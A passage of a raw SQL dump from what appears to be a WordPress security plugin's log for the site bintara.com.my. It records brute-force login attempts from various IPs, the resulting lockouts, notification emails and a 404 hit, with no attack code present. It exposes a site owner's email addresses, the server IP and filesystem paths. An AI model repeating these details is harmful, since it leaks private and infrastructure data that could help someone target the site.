\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYwfDDrcQxTmGrCWuaUcwAAAcg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075324.4606\";s:12:\"REQUEST_TIME\";s:10:\"1569075324\";}}','notice','2019-09-21 14:15:25','2019-09-21 14:15:24',17853992,19341280,'https://bintara.com.my/test/wp-login.php',1,0,'89.145.74.91'),(26184,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:15:24\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:15:24\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:15:24\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:15:24\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:15:25','2019-09-21 14:15:24',17938920,19341280,'https://bintara.com.my/test/wp-login.php',1,0,'89.145.74.91'),(26185,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:15:25','2019-09-21 14:15:24',18145760,19341280,'https://bintara.com.my/test/wp-login.php',1,0,'89.145.74.91'),(26186,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYwhnkXpgmG5P@iB8k7WgAAAIc\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.146.230\";s:11:\"REMOTE_PORT\";s:5:\"55142\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYwhnkXpgmG5P@iB8k7WgAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569075334.139\";s:12:\"REQUEST_TIME\";s:10:\"1569075334\";}}','notice','2019-09-21 14:15:35','2019-09-21 14:15:34',17854192,19338416,'https://bintara.com.my/2019/wp-login.php',1,0,'132.148.146.230'),(26187,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:15:34\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:15:34\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:15:34\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:15:34\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:15:35','2019-09-21 14:15:34',17938728,19338416,'https://bintara.com.my/2019/wp-login.php',1,0,'132.148.146.230'),(26188,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:15:35','2019-09-21 14:15:34',18145320,19338416,'https://bintara.com.my/2019/wp-login.php',1,0,'132.148.146.230'),(26189,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYwnHkXpgmG5P@iB8k7YgAAAI0\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"146.185.183.107\";s:11:\"REMOTE_PORT\";s:5:\"53290\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYwnHkXpgmG5P@iB8k7YgAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075356.3303\";s:12:\"REQUEST_TIME\";s:10:\"1569075356\";}}','notice','2019-09-21 14:15:57','2019-09-21 14:15:56',17854192,19338416,'https://bintara.com.my/blog/wp-login.php',1,0,'146.185.183.107'),(26190,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:15:56\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:15:56\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:15:56\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:15:56\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:15:57','2019-09-21 14:15:56',17938720,19338416,'https://bintara.com.my/blog/wp-login.php',1,0,'146.185.183.107'),(26191,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:15:57','2019-09-21 14:15:56',18145280,19338416,'https://bintara.com.my/blog/wp-login.php',1,0,'146.185.183.107'),(26192,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYwxTDrcQxTmGrCWuaUfAAAAdY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"45.117.168.236\";s:11:\"REMOTE_PORT\";s:5:\"59836\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYwxTDrcQxTmGrCWuaUfAAAAdY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075397.6656\";s:12:\"REQUEST_TIME\";s:10:\"1569075397\";}}','notice','2019-09-21 14:16:39','2019-09-21 14:16:38',17852664,19338208,'https://bintara.com.my/wp/wp-login.php',1,0,'45.117.168.236'),(26193,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:16:38\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:16:38\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:16:38\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:16:38\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:16:39','2019-09-21 14:16:38',17937200,19338208,'https://bintara.com.my/wp/wp-login.php',1,0,'45.117.168.236'),(26194,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:16:39','2019-09-21 14:16:38',18143600,19338208,'https://bintara.com.my/wp/wp-login.php',1,0,'45.117.168.236'),(26195,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYw4ViJ7D9Gn7wDPh8lvQAAAM0\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"209.222.3.58\";s:11:\"REMOTE_PORT\";s:5:\"41694\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYw4ViJ7D9Gn7wDPh8lvQAAAM0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075425.6394\";s:12:\"REQUEST_TIME\";s:10:\"1569075425\";}}','notice','2019-09-21 14:17:06','2019-09-21 14:17:05',17850144,19340616,'https://bintara.com.my/test/wp-login.php',1,0,'209.222.3.58'),(26196,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:17:05\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:17:05\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:17:05\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:17:05\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:17:06','2019-09-21 14:17:05',17935000,19340616,'https://bintara.com.my/test/wp-login.php',1,0,'209.222.3.58'),(26197,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:17:06','2019-09-21 14:17:05',18141576,19340616,'https://bintara.com.my/test/wp-login.php',1,0,'209.222.3.58'),(26198,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:33:\"http://bintara.com.my/?page_id=14\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"ISO-8859-1,utf-8;q=0.7,*;q=0.7\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-us,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:30:\"http://bintara.net/?page_id=14\";s:15:\"HTTP_USER_AGENT\";s:109:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 49FF929A4)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=14\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.255.58.40\";s:11:\"REMOTE_PORT\";s:5:\"18787\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:22:\"http://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYw87fBTP0kPOVnb8jxcAAAAFY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569075444.065\";s:12:\"REQUEST_TIME\";s:10:\"1569075444\";}}','notice','2019-09-21 14:17:25','2019-09-21 14:17:24',18124816,19649808,'http://bintara.com.myhttp://bintara.com.my/?page_id=14',1,0,'159.255.58.40'),(26199,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYw93kXpgmG5P@iB8k7lQAAAIw\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"51.77.193.28\";s:11:\"REMOTE_PORT\";s:5:\"37479\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYw93kXpgmG5P@iB8k7lQAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569075447.699\";s:12:\"REQUEST_TIME\";s:10:\"1569075447\";}}','notice','2019-09-21 14:17:28','2019-09-21 